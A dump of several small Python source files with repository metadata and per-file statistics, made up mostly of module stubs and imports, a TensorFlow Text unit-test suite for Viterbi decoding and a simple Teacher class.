2e2d21a742ebcd439971a32357f2d0abd0ce61eb
[ "MIT" ]
24
2018-10-05T13:04:30.000Z
2020-05-12T08:45:34.000Z
py_tdlib/constructors/request_password_recovery.py
MrMahdi313/python-tdlib
2e2d21a742ebcd439971a32357f2d0abd0ce61eb
[ "MIT" ]
3
2019-06-26T07:20:20.000Z
2021-05-24T13:06:56.000Z
py_tdlib/constructors/request_password_recovery.py
MrMahdi313/python-tdlib
2e2d21a742ebcd439971a32357f2d0abd0ce61eb
[ "MIT" ]
5
2018-10-05T14:29:28.000Z
2020-08-11T15:04:10.000Z
from ..factory import Method class requestPasswordRecovery(Method): pass
12.666667
38
0.802632
8
76
7.625
0.875
0
0
0
0
0
0
0
0
0
0
0
0.131579
76
5
39
15.2
0.924242
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.666667
0.333333
0
0.666667
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
1
0
0
6
375dafd5c943336a42c523a676b8a24a7290832f
27
py
Python
src/euler_python_package/euler_python/medium/p359.py
wilsonify/euler
5214b776175e6d76a7c6d8915d0e062d189d9b79
[ "MIT" ]
null
null
null
src/euler_python_package/euler_python/medium/p359.py
wilsonify/euler
5214b776175e6d76a7c6d8915d0e062d189d9b79
[ "MIT" ]
null
null
null
src/euler_python_package/euler_python/medium/p359.py
wilsonify/euler
5214b776175e6d76a7c6d8915d0e062d189d9b79
[ "MIT" ]
null
null
null
def problem359(): pass
9
17
0.62963
3
27
5.666667
1
0
0
0
0
0
0
0
0
0
0
0.15
0.259259
27
2
18
13.5
0.7
0
0
0
0
0
0
0
0
0
0
0
0
1
0.5
true
0.5
0
0
0.5
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
1
0
0
0
0
0
6
379a24c2dc9b4a6c5f50a37897f6f29edf3b6bd6
25
py
Python
src/pyoram/crypto/__init__.py
ghackebeil/PyORAM
53e109dfb1ecec52348a70ddc64fae65eea7490a
[ "MIT" ]
24
2016-04-14T14:27:37.000Z
2022-03-13T13:53:18.000Z
src/pyoram/crypto/__init__.py
ghackebeil/PyORAM
53e109dfb1ecec52348a70ddc64fae65eea7490a
[ "MIT" ]
4
2016-03-14T04:40:23.000Z
2016-06-01T04:37:18.000Z
src/pyoram/crypto/__init__.py
ghackebeil/PyORAM
53e109dfb1ecec52348a70ddc64fae65eea7490a
[ "MIT" ]
4
2016-03-16T23:53:24.000Z
2020-05-27T19:27:37.000Z
import pyoram.crypto.aes
12.5
24
0.84
4
25
5.25
1
0
0
0
0
0
0
0
0
0
0
0
0.08
25
1
25
25
0.913043
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
37a4da46a3c687b596eeb192889b847bb0d9da4c
83
py
Python
switchingtime/__init__.py
xinyufei/Quantum-Control-qutip
bd8a119b9ff8ac0929ffb1f706328759d89fcb5e
[ "BSD-3-Clause" ]
1
2021-08-31T02:28:54.000Z
2021-08-31T02:28:54.000Z
switchingtime/__init__.py
xinyufei/Quantum-Control-qutip
bd8a119b9ff8ac0929ffb1f706328759d89fcb5e
[ "BSD-3-Clause" ]
null
null
null
switchingtime/__init__.py
xinyufei/Quantum-Control-qutip
bd8a119b9ff8ac0929ffb1f706328759d89fcb5e
[ "BSD-3-Clause" ]
null
null
null
from switchingtime.switch_time import * from switchingtime.obtain_switches import *
41.5
43
0.86747
10
83
7
0.7
0.485714
0
0
0
0
0
0
0
0
0
0
0.084337
83
2
43
41.5
0.921053
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
37ac4eb84271a591d983d4b957d57fd5fec029b6
11,951
py
Python
tensorflow_text/python/numpy/viterbi_decode_test.py
fsx950223/text
24ea0a43ef21a33c3f3f2f526530d23ad3ff7d90
[ "Apache-2.0" ]
1
2020-10-10T14:10:07.000Z
2020-10-10T14:10:07.000Z
tensorflow_text/python/numpy/viterbi_decode_test.py
fsx950223/text
24ea0a43ef21a33c3f3f2f526530d23ad3ff7d90
[ "Apache-2.0" ]
1
2021-02-24T01:09:21.000Z
2021-02-24T01:09:21.000Z
tensorflow_text/python/numpy/viterbi_decode_test.py
fsx950223/text
24ea0a43ef21a33c3f3f2f526530d23ad3ff7d90
[ "Apache-2.0" ]
null
null
null
# coding=utf-8 # Copyright 2020 TF.Text Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for tensorflow_text.python.numpy.viterbi_decode.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from absl.testing import absltest import numpy as np from tensorflow_text.python.numpy import viterbi_decode class ViterbiDecodeTest(absltest.TestCase): def test_viterbi_in_log_space(self): scores = np.array([[10.0, 12.0, 6.0, 4.0], [13.0, 12.0, 11.0, 10.0]]) x = -float('inf') # pyformat: disable # pylint: disable=bad-whitespace # pylint: disable=bad-continuation transition_params = np.array([[-1.0, 1.0, -2.0, 2.0], [ 3.0, -3.0, 4.0, -4.0], [ 5.0, x, 10.0, x], [-7.0, 7.0, -8.0, 8.0]]) # pyformat: enable # pylint: enable=bad-whitespace # pylint: enable=bad-continuation # STEP 1: # Starting scores are {10.0, 12.0, 6.0, 4.0} # Raw scores are: {13.0, 12.0, 11.0, 10.0} # # To get the weighted scores, add the column of the final state to # the raw score. 
# # Final state 0: (13.0) Weighted scores are {12.0, 16.0, 18.0, 6.0} # New totals are {22, 28, 24, 10} [max 28 from 1] # # Final state 1: (12.0) Weighted scores are {13.0, 9.0, X, 19.0}, # New totals are {23, 21, X, 23} [max 23 from 3] # # Final state 2: (11.0) Weighted scores are {9, 15, 21, 3}, # New totals are {19, 27, 27, 7} [max 27 from 2] # # Final state 3: (10.0) Weighted scores are {12, 6, X, 18}, # New totals are {19, 18, X, 22} [max 25 from 3] # # Top scores are [28, 26, 27, 25] from [1, 3, 2, 3]. # Final state is [0] with a sequence of [1->0]. sequence, score = viterbi_decode.decode(scores, transition_params) self.assertAlmostEqual(28.0, score) self.assertEqual([1, 0], sequence) def test_viterbi_with_allowed_transitions(self): scores = np.array([[10.0, 12.0, 6.0, 4.0], [13.0, 12.0, 11.0, 10.0]]) # pyformat: disable # pylint: disable=bad-whitespace # pylint: disable=bad-continuation transition_params = np.array([[-1.0, 1.0, -2.0, 2.0], [ 3.0, -3.0, 4.0, -4.0], [ 5.0, 100.0, 10.0, 200.0], [-7.0, 7.0, -8.0, 8.0]]) allowed_transitions = np.array([[ True, True, True, True], [ True, True, True, True], [ True, False, True, False], [ True, True, True, True]]) # pyformat: enable # pylint: enable=bad-whitespace # pylint: enable=bad-continuation # STEP 1: # Starting scores are {10.0, 12.0, 6.0, 4.0} # Raw scores are: {13.0, 12.0, 11.0, 10.0} # # Final state 0: (13.0) Weighted scores are {12.0, 16.0, 18.0, 6.0} # New totals are {22, 28, 24, 10} [max 28 from 1] # # Final state 1: (12.0) Weighted scores are {13.0, 9.0, X, 19.0}, # New totals are {23, 21, X, 23} [max 23 from 3] # # Final state 2: (11.0) Weighted scores are {9, 15, 21, 3}, # New totals are {19, 27, 27, 7} [max 27 from 2] # # Final state 3: (10.0) Weighted scores are {12, 6, X, 18}, # New totals are {19, 18, X, 22} [max 22 from 3] # # Top scores are [28, 26, 27, 25] from [1, 3, 2, 3]. # Final state is [0] with a sequence of [1->0]. 
sequence, score = viterbi_decode.decode(scores, transition_params, allowed_transitions) self.assertAlmostEqual(28.0, score) self.assertEqual([1, 0], sequence) def test_viterbi_in_log_space_with_start_and_end(self): scores = np.array([[10.0, 12.0, 7.0, 4.0], [13.0, 12.0, 11.0, 10.0]]) x = -float('inf') # pyformat: disable # pylint: disable=bad-whitespace # pylint: disable=bad-continuation transition_params = np.array([[-1.0, 1.0, -2.0, 2.0, 0.0], [ 3.0, -3.0, 4.0, -4.0, 0.0], [ 5.0, x, 10.0, x, x], [-7.0, 7.0, -8.0, 8.0, 0.0], [ 0.0, x, 2.0, 3.0, 0.0]]) # pyformat: enable # pylint: enable=bad-whitespace # pylint: enable=bad-continuation # STEP 1: # All scores should be summed with the last row in the weight tensor, so the # 'real' scores are: # B0: { 10.0, X, 9.0, 7.0} # # STEP 2: # Raw scores are: {13.0, 12.0, 11.0, 10.0} # # Final state 0: (13.0) Weighted scores are {12.0, 16.0, 18.0, 6.0} # New totals are {22, X, 27, 18} [max 27 from 2] # # Final state 1: (12.0) Weighted scores are {13.0, 9.0, X, 19.0}, # New totals are {23, X, X, 26} [max 26 from 3] # # Final state 2: (11.0) Weighted scores are {9, 15, 21, 3}, # New totals are {19, X, 30, 10} [max 30 from 2] # # Final state 3: (10.0) Weighted scores are {12, 6, X, 18}, # New totals are {19, X, X, 25} [max 25 from 3] # # Top scores are [27, 26, 30, 25] from [2, 3, 2, 3]. # 2->OUT is X, so final scores are [27, 26, X, 25] for a # final state of [0] with a sequence of [2->0]. 
sequence, score = viterbi_decode.decode( scores, transition_params, use_start_and_end_states=True) self.assertAlmostEqual(27.0, score) self.assertEqual([2, 0], sequence) def test_viterbi_in_exp_space(self): scores = np.array([[10.0, 12.0, 6.0, 4.0], [13.0, 12.0, 11.0, 10.0]]) x = 0.0 # pyformat: disable # pylint: disable=bad-whitespace # pylint: disable=bad-continuation transition_params = np.array([[ .1, .2, .3, .4], [ .5, .6, .7, .8], [ .9, x, .15, x], [.25, .35, .45, .55]]) # pyformat: enable # pylint: enable=bad-whitespace # pylint: enable=bad-continuation # STEP 1: # Starting scores are {10.0, 12.0, 6.0, 4.0} # Raw scores are: {13.0, 12.0, 11.0, 10.0} # # Final state 0: (13.0) Weighted scores are {1.3, 6.5, 11.7, 3.25} # New totals are {13, 78, 70.2, 13} [max 78 from 1] # # Final state 1: (12.0) Weighted scores are {2.4, 7.2, 0, 4.2}, # New totals are {24, 86.4, 0, 16.8} [max 86.4 from 1] # # Final state 2: (11.0) Weighted scores are {3.3, 7.7, 1.65, 4.95}, # New totals are {33, 92.4, 9.9, 19.8} [max 92.4 from 1] # # Final state 3: (10.0) Weighted scores are {4, 8, 0, 5.5}, # New totals are {40, 96, 0, 22} [max 96 from 1] # # Top scores are [78, 86.4, 92.4, 96] from [1, 1, 1, 1]. # Final state is [3] with a sequence of [1->3]. 
sequence, score = viterbi_decode.decode( scores, transition_params, use_log_space=False) self.assertAlmostEqual(96.0, score) self.assertEqual([1, 3], sequence) def test_viterbi_in_exp_space_with_allowed_transitions(self): scores = np.array([[10.0, 12.0, 6.0, 4.0], [13.0, 12.0, 11.0, 10.0]]) # pyformat: disable # pylint: disable=bad-whitespace # pylint: disable=bad-continuation transition_params = np.array([[ .1, .2, .3, .4], [ .5, .6, .7, .8], [ .9, .5, .15, .5], [.25, .35, .45, .55]]) allowed_transitions = np.array([[ True, True, True, True], [ True, True, True, True], [ True, False, True, False], [ True, True, True, True]]) # pyformat: enable # pylint: enable=bad-whitespace # pylint: enable=bad-continuation # STEP 1: # Starting scores are {10.0, 12.0, 6.0, 4.0} # Raw scores are: {13.0, 12.0, 11.0, 10.0} # # Final state 0: (13.0) Weighted scores are {1.3, 6.5, 11.7, 3.25} # New totals are {13, 78, 70.2, 13} [max 78 from 1] # # Final state 1: (12.0) Weighted scores are {2.4, 7.2, 0, 4.2}, # New totals are {24, 86.4, 0, 16.8} [max 86.4 from 1] # # Final state 2: (11.0) Weighted scores are {3.3, 7.7, 1.65, 4.95}, # New totals are {33, 92.4, 9.9, 19.8} [max 92.4 from 1] # # Final state 3: (10.0) Weighted scores are {4, 8, 0, 5.5}, # New totals are {40, 96, 0, 22} [max 96 from 1] # # Top scores are [78, 86.4, 92.4, 96] from [1, 1, 1, 1]. # Final state is [3] with a sequence of [1->3]. 
sequence, score = viterbi_decode.decode( scores, transition_params, allowed_transitions, use_log_space=False) self.assertAlmostEqual(96.0, score) self.assertEqual([1, 3], sequence) def test_viterbi_in_exp_space_with_start_and_end(self): scores = np.array([[10.0, 12.0, 6.0, 4.0], [13.0, 12.0, 11.0, 10.0]]) x = 0.0 # pyformat: disable # pylint: disable=bad-whitespace # pylint: disable=bad-continuation transition_params = np.array([[ .1, .2, .3, .4, .1], [ .5, .6, .7, .8, .1], [ .9, x, .15, x, .1], [.25, .35, .45, .55, .5], [ .1, .5, .1, .1, x]]) # pyformat: enable # pylint: enable=bad-whitespace # pylint: enable=bad-continuation # STEP 1: # Starting scores are {.5, 6.0, .6, .4} # Raw scores are: {13.0, 12.0, 11.0, 10.0} # # Final state 0: (13.0) Weighted scores are {1.3, 6.5, 11.7, 3.25} # New totals are {0.13, 39, 7.02, 1.3} [max 39 from 1] # # Final state 1: (12.0) Weighted scores are {2.4, 7.2, 0, 4.2}, # New totals are {0.24, 43.2, 0, 1.68} [max 43.2 from 1] # # Final state 2: (11.0) Weighted scores are {3.3, 7.7, 1.65, 4.95}, # New totals are {0.33, 46.2, 0.99, 1.98} [max 46.2 from 1] # # Final state 3: (10.0) Weighted scores are {4, 8, 0, 5.5}, # New totals are {0.4, 48, 0, 2.2} [max 48 from 1] # # Top scores are [39, 43.2, 46.2, 48] from [1, 1, 1, 1]. # Final multiplication results in [3.9, 4.32, 4.62, 24] # Final state is [3] with a sequence of [1->3]. 
sequence, score = viterbi_decode.decode( scores, transition_params, use_log_space=False, use_start_and_end_states=True) self.assertAlmostEqual(24.0, score) self.assertEqual([1, 3], sequence) def test_viterbi_in_exp_space_with_negative_weights_fails(self): scores = np.array([[10.0, 12.0, 6.0, 4.0], [13.0, 12.0, 11.0, 10.0]]) x = 0.0 # pyformat: disable # pylint: disable=bad-whitespace # pylint: disable=bad-continuation transition_params = np.array([[ .1, .2, .3, .4], [ .5, -.6, .7, .8], [ .9, x, .15, x], [.25, .35, .45, .55]]) # pyformat: enable # pylint: enable=bad-whitespace # pylint: enable=bad-continuation with self.assertRaises(ValueError): _, _ = viterbi_decode.decode( scores, transition_params, use_log_space=False) if __name__ == '__main__': absltest.main()
39.704319
80
0.527655
1,869
11,951
3.314072
0.108079
0.06248
0.015499
0.069745
0.803358
0.797385
0.789635
0.779464
0.764127
0.750565
0
0.145191
0.318802
11,951
300
81
39.836667
0.615649
0.503389
0
0.526316
0
0
0.002432
0
0
0
0
0
0.136842
1
0.073684
false
0
0.063158
0
0.147368
0.010526
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
8089c667c4daaa8c51834b68d3b66f30ea2a837c
230
py
Python
cs1006-IntroPython/HW4-ObjectInheritance/teacher/teacher.py
ecahern16/AcademicCode
cf95a65545e7054604c23d4830f709323eeb81f5
[ "Apache-2.0" ]
null
null
null
cs1006-IntroPython/HW4-ObjectInheritance/teacher/teacher.py
ecahern16/AcademicCode
cf95a65545e7054604c23d4830f709323eeb81f5
[ "Apache-2.0" ]
null
null
null
cs1006-IntroPython/HW4-ObjectInheritance/teacher/teacher.py
ecahern16/AcademicCode
cf95a65545e7054604c23d4830f709323eeb81f5
[ "Apache-2.0" ]
null
null
null
from person.person import Person class Teacher(Person): def __init__(self, name, pay=None): Person.__init__(self, name) self.pay = 0 def __repr__(self): return self.name
19.166667
39
0.569565
27
230
4.407407
0.518519
0.201681
0.201681
0
0
0
0
0
0
0
0
0.006623
0.343478
230
12
40
19.166667
0.781457
0
0
0
0
0
0
0
0
0
0
0
0
1
0.285714
false
0
0.142857
0.142857
0.714286
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
6